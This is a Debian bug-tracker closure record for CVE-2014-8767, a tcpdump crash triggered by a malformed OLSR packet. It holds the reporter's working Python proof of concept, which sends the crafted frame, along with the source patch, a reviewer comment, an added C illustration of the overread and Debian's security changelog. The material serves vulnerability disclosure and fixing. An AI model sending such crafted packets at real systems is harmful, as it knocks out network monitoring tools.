Your message dated Mon, 08 Dec 2014 15:33:46 +0000
with message-id <e1xy0jm-0006tm...@franck.debian.org>
and subject line Bug#770434: fixed in tcpdump 4.3.0-1+deb7u1
has caused the Debian Bug report #770434,
regarding tcpdump: CVE-2014-8767: tcpdump denial of service in verbose mode using malformed OLSR payload
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
770434: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: tcpdump
Version: 4.6.2
tags: Security

Use the following script to generate the packet:

#!/usr/bin/env python
# Sends one crafted Ethernet frame (IPv4 / UDP / OLSR HELLO) on the loopback
# interface. Opening an AF_PACKET socket needs CAP_NET_RAW, so run it as root.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

# Raw frame, Ethernet header first. A bytes literal so the script also runs
# under Python 3, where send() rejects a str.
olsr_frame = b"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

s.send(olsr_frame)
s.close()

# Start the verbose capture in another terminal before sending:
#sudo tcpdump -i lo -s 0 -n -v
This causes a segfault in tcpdump. This bug was reported as CVE-2014-8767.
The proposed patch is in the attached file. The main idea is to check the length
of the available data before printing it on screen.

The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

The original report on BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90

--
CongNT

--- tcpdump-tcpdump-4.6/print-olsr.c	2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c	2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
     ND_PRINT((ndo, "\n\t      neighbor\n\t\t"));
     neighbor = 1;
 
+    u_int caplength;
+
+    /* Checking length of available data before print */
+    caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+    if (hello_len > caplength)
+        hello_len = caplength;
+
     while (hello_len >= sizeof(struct in_addr)) {
 
         /* print 4 neighbors per line */
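
Review bot: the clamp `if (hello_len > caplength) hello_len = caplength;` silently discards the neighbors that were not captured, so the verbose output of a truncated packet looks complete and the reader has no hint that addresses are missing; tcpdump's convention for this case is an ND_TCHECK-style check on each address inside the `while (hello_len >= sizeof(struct in_addr))` loop that jumps to the file's trunc label and reports the truncation. A smaller point: `u_int caplength;` is declared after the `neighbor = 1;` statement (a C99 mixed declaration); move it up with the function's other locals to match the surrounding code.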

--- End Message ---
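
The report above says only that the fix checks the available data before printing. As an added illustration (editor-supplied example code, not tcpdump's print-olsr.c and not CongNT's patch), the following C program models the HELLO link-message neighbor walk: the unpatched shape trusts the header-declared length, the patched shape clamps it to the captured bytes the way the hunk does with ndo_snapend. The function names (parse_hello_link, print_hello_neighbors, unchecked_overread), the walk_result struct and the two byte buffers are constructed for this example; the header layout (link code, reserved, 16-bit link message size, then neighbor addresses) follows RFC 3626 section 6.1.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IPv4 neighbor address size; print-olsr.c uses sizeof(struct in_addr). */
#define ADDR_LEN 4u
/* OLSR HELLO link-message header: link code, reserved, 16-bit link_msg_size
 * (RFC 3626 section 6.1). Neighbor interface addresses follow it. */
#define LINK_HDR_LEN 4u

struct walk_result {
    size_t printed;    /* neighbor addresses actually formatted */
    size_t truncated;  /* addresses the header promised but the capture lacks */
};

/* Unpatched shape of the loop: it trusts hello_len from the packet and walks
 * whole addresses until fewer than ADDR_LEN bytes remain. This function only
 * computes how many bytes that walk would read past snapend; it never
 * dereferences anything, so it is safe to call on any input. */
static size_t unchecked_overread(const uint8_t *msg_data, size_t hello_len,
                                 const uint8_t *snapend)
{
    size_t avail = (snapend >= msg_data) ? (size_t)(snapend - msg_data) : 0;
    size_t needed = hello_len - hello_len % ADDR_LEN;  /* whole addresses only */
    return needed > avail ? needed - avail : 0;
}

/* Patched shape: clamp hello_len to the captured bytes (the hunk's caplength),
 * then walk and format. out may be NULL to run silently. */
static struct walk_result print_hello_neighbors(const uint8_t *msg_data, size_t hello_len,
                                                const uint8_t *snapend, FILE *out)
{
    struct walk_result r = {0, 0};
    size_t caplength = (snapend >= msg_data) ? (size_t)(snapend - msg_data) : 0;
    size_t declared = hello_len / ADDR_LEN;   /* what the header promised */

    if (hello_len > caplength)
        hello_len = caplength;

    while (hello_len >= ADDR_LEN) {
        if (out)   /* four neighbors per line, as the dissector prints them */
            fprintf(out, "%s%u.%u.%u.%u", (r.printed % 4) ? ", " : "\n\t\t",
                    (unsigned)msg_data[0], (unsigned)msg_data[1],
                    (unsigned)msg_data[2], (unsigned)msg_data[3]);
        msg_data += ADDR_LEN;
        hello_len -= ADDR_LEN;
        r.printed++;
    }
    r.truncated = declared - r.printed;
    return r;
}

/* Parse one link message starting at pkt, bounded by snapend. The header is
 * bounds-checked before link_msg_size is trusted for anything. */
static struct walk_result parse_hello_link(const uint8_t *pkt, const uint8_t *snapend, FILE *out)
{
    struct walk_result none = {0, 0};
    if (snapend < pkt || (size_t)(snapend - pkt) < LINK_HDR_LEN)
        return none;                           /* header itself not captured */
    unsigned link_msg_size = ((unsigned)pkt[2] << 8) | pkt[3];
    if (link_msg_size < LINK_HDR_LEN)
        return none;                           /* size smaller than its own header */
    if (out)
        fprintf(out, "link code 0x%02x, link_msg_size %u", (unsigned)pkt[0], link_msg_size);
    return print_hello_neighbors(pkt + LINK_HDR_LEN, link_msg_size - LINK_HDR_LEN, snapend, out);
}

/* Constructed inputs (not real captures). Both declare more neighbors than the
 * buffer holds, which is what a short snaplen or a lying header produces. */
static const uint8_t short_capture[] = {
    0x06, 0x00, 0x00, 0x1c,                    /* link_msg_size 28: 6 neighbors declared */
    10, 0, 0, 1, 10, 0, 0, 2, 10, 0, 0, 3      /* only 3 captured */
};
static const uint8_t lying_header[] = {
    0x06, 0x00, 0x02, 0x02,                    /* link_msg_size 0x0202 = 514, 0x02 filler like the PoC */
    10, 0, 0, 1, 10, 0, 0, 2, 10, 0, 0, 3
};

int main(void)
{
    const uint8_t *end = short_capture + sizeof short_capture;
    struct walk_result r = parse_hello_link(short_capture, end, stdout);
    printf("\n  printed %zu, truncated %zu, unpatched loop would overread %zu bytes\n",
           r.printed, r.truncated,
           unchecked_overread(short_capture + LINK_HDR_LEN, 28 - LINK_HDR_LEN, end));

    end = lying_header + sizeof lying_header;
    r = parse_hello_link(lying_header, end, stdout);
    printf("\n  printed %zu, truncated %zu, unpatched loop would overread %zu bytes\n",
           r.printed, r.truncated,
           unchecked_overread(lying_header + LINK_HDR_LEN, 514 - LINK_HDR_LEN, end));
    return 0;
}
```

The second buffer is the interesting one: a 16-bit size field costs the attacker nothing, and with a 514-byte claim the unclamped loop would read almost 500 bytes past the end of the captured packet, which is the read that crashes tcpdump in the report. Note that the clamp makes the output silently shorter; recording the truncated count, as walk_result does here, is what lets a caller flag the packet instead of printing it as if it were complete.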
--- Begin Message ---
Source: tcpdump
Source-Version: 4.3.0-1+deb7u1

We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Francoise <rfranco...@debian.org> (supplier of updated tcpdump package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 29 Nov 2014 18:09:49 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.3.0-1+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Romain Francoise <rfranco...@debian.org>
Closes: 770424 770434
Description: 
 tcpdump    - command-line network traffic analyzer
Changes:
 tcpdump (4.3.0-1+deb7u1) wheezy-security; urgency=high
 .
   * Add patches extracted from the upstream tcpdump_4.3 branch fixing
     three security issues:
     + CVE-2014-8767: missing bounds checks in the OLSR dissector
       (closes: #770434).
     + CVE-2014-8769: missing bounds checks in the AODV dissector
       (closes: #770424).
     + CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1: 
 b34a71db8cbbe8e6943d286f069d8b3cd05f44b6 1931 tcpdump_4.3.0-1+deb7u1.dsc
 5d0432e4831ca81633a6c9da732caad77d64a9ac 887619 tcpdump_4.3.0.orig.tar.gz
 44b3da0e4f51dc5e5f37310cc8244e32a86194d5 14972 tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 25f883fa2d0b7a36925bea91838cc1e54bfe9abc 419898 tcpdump_4.3.0-1+deb7u1_amd64.deb
Checksums-Sha256: 
 b345b81792830fec740ff616b2b4d5e5a7e6186eb77e3b2f6d1658a1174ff2d4 1931 tcpdump_4.3.0-1+deb7u1.dsc
 efd08b610210d39977ec3175fa82dad9fbd33587930081be2a905a712dba4286 887619 tcpdump_4.3.0.orig.tar.gz
 4d36e1a9140d3268a0bc1e71d89ee4649c9c1a17002b20078a85720b5673fe23 14972 tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 5d46ca857cbdf677a6a00ed1017db49116f181371aaf9f64afa4b4c099573665 419898 tcpdump_4.3.0-1+deb7u1_amd64.deb
Files: 
 10b6ddd6ebd74e723e5393478585fc25 1931 net optional tcpdump_4.3.0-1+deb7u1.dsc
 a3fe4d30ac85ff5467c889ff46b7e1e8 887619 net optional tcpdump_4.3.0.orig.tar.gz
 af8927109c537f1650af40c92738d107 14972 net optional tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 99224ad04e54b31149295e59cc6fcd05 419898 net optional tcpdump_4.3.0-1+deb7u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----

--- End Message ---